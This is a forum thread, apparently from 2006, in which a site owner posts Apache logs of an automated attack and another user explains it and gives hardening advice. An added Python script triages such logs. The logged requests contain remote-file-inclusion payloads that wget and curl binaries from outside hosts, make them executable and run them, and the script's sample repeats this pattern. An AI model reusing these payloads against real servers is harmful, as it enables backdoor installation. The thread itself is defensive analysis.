Real Life SPAM visit to my Website!
18 years 6 months ago #14315
by franco190453
Real Life SPAM visit to my Website! was created by franco190453
These are the details reported by Apache from an unfriendly visit:
Question: What did this ugly citizen try to do?
Did he cause harm? Where is this IP from?
What should be the security procedure to handle this illegal visitor?
[code:1]
200.105.234.43 - - [16/Apr/2006:20:03:50 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295
200.105.234.43 - - [16/Apr/2006:20:03:54 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 300
200.105.234.43 - - [16/Apr/2006:20:03:58 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
200.105.234.43 - - [16/Apr/2006:20:04:02 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 308
200.105.234.43 - - [16/Apr/2006:20:04:08 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 308
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 305
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 302
200.105.234.43 - - [16/Apr/2006:20:04:16 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 302
200.105.234.43 - - [16/Apr/2006:20:04:17 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 302
200.105.234.43 - - [16/Apr/2006:20:04:20 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= &mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp; wget%2070.168.74.193/strange;chmod%20744%20strange; ./strange;cd%20/var/tmp;curl%20-o%20ar%20 http://207.90.211.54/ar;chmod%20744%20ar; ./ar;echo%20YYY;echo| HTTP/1.1" 404 295
200.105.234.43 - - [16/Apr/2006:20:04:23 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= &mosConfig_absolute_path=http://210.3.4.193/cmd.txt? &cmd=cd%20/tmp;wget%2070.168.74.193/strange; chmod%20744%20strange;./strange;cd%20/var/tmp; curl%20-o%20ar%20http://207.90.211.54/ar; chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 294
200.105.234.43 - - [16/Apr/2006:20:04:32 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295
[/code:1]
18 years 6 months ago #14321
by nske
Replied by nske on topic Re: Real Life SPAM visit to my Website!
This was apparently caused by some little program that randomly tried to exploit the php xml-rpc bug through a number of popular scripts. It attempted to download a program uploaded somewhere on the web (probably a backdoor) and execute it. From what appears in the logs, apache returned a 404 (not found) error on all the requests, so nothing happened.
To minimize your exposure against such attacks and their effects, first of all treat the user running apache as an untrusted user. You should regard every file on the filesystems that apache has read access to as very likely to be read by an intruder. Unfortunately, some things like database account info need to be accessible; however, try to keep this to a minimum. Similarly, any file or directory that apache has write access to can allow the intruder to upload a backdoor, and execute permissions can make things easier for him, so be careful with every file's permissions and consider mounting filesystems with the noexec argument. Furthermore, if possible, run apache in a separate chroot or jail. PHP should run in safe mode, and a few other options definable through php.ini can have an impact on security (they are documented in the official PHP documentation).
Other than that, a well configured firewall can minimize the chance for a backdoor to work, and some active application-layer monitoring software, like Snort, can detect and block these kinds of attempts. Specifically for apache, there is also [url=http://www.modsecurity.org]Mod Security[/url] that can serve the same purpose.
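A defender-side triage of this kind of log, written as an added example for this thread (it is not code from either poster): it parses Apache common-log lines, counts xmlrpc.php probes per source IP, decodes any mosConfig_absolute_path remote-include attempt together with the shell commands smuggled in the cmd parameter, and records whether any flagged request got a status below 400 (in the thread's log every request was a 404, so nothing ran). The sample lines are constructed on the model of the thread's log, using documentation-range IPs rather than real hosts.

```python
import re
from collections import defaultdict
from urllib.parse import unquote
# Apache common log format: ip ident user [time] "request" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>.*?) HTTP/\d\.\d" (?P<status>\d{3}) \S+$')
# Remote-file-inclusion marker from the thread: a config path pointed at an external URL.
RFI_RE = re.compile(r'mosConfig_absolute_path=(https?://[^&\s]+)', re.I)
# Constructed sample modelled on the thread's log (documentation-range IPs, not real hosts).
SAMPLE_LOG = """\
198.51.100.7 - - [16/Apr/2006:20:03:50 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295
198.51.100.7 - - [16/Apr/2006:20:03:54 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 300
198.51.100.7 - - [16/Apr/2006:20:04:10 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 305
198.51.100.7 - - [16/Apr/2006:20:04:20 -0600] "GET /index2.php?option=com_content&mosConfig_absolute_path=http://203.0.113.9/cmd.txt?&cmd=cd%20/tmp;wget%20203.0.113.9/x;chmod%20744%20x;./x HTTP/1.1" 404 295
203.0.113.20 - - [16/Apr/2006:20:05:01 -0600] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 8120
"""

def parse_line(line):
    """Fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def analyze(log_text):
    """Per source IP: xmlrpc.php probe count, decoded RFI attempts, and whether any flagged request got a non-error status."""
    by_ip = defaultdict(lambda: {"xmlrpc_probes": 0, "rfi_attempts": [], "any_success": False})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        entry, flagged = by_ip[rec["ip"]], False
        if rec["method"] == "POST" and rec["target"].split("?", 1)[0].endswith("/xmlrpc.php"):
            entry["xmlrpc_probes"] += 1
            flagged = True
        m = RFI_RE.search(rec["target"])
        if m:                                   # undo %20 etc. so the report is readable
            cmd = unquote(rec["target"]).partition("cmd=")[2]
            entry["rfi_attempts"].append({"include_url": m.group(1), "status": rec["status"],
                                          "commands": [c for c in cmd.split(";") if c]})
            flagged = True
        if flagged and rec["status"] < 400:     # 2xx/3xx: the targeted script actually existed
            entry["any_success"] = True
    return dict(by_ip)

def suspicious_ips(report):
    """Sources worth blocking at the firewall: any xmlrpc probe or RFI attempt."""
    return sorted(ip for ip, e in report.items() if e["xmlrpc_probes"] or e["rfi_attempts"])
```

Run `analyze` over a real access log and check `any_success`: a 404 on every flagged line, as in this thread, means the probed script was not there; a 200 on an RFI line is the case that needs a forensic look at the server.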
18 years 6 months ago #14322
by franco190453
Replied by franco190453 on topic To Nske
Thanks Nske.
I will take into consideration every single word you said.
Thanks again!!!!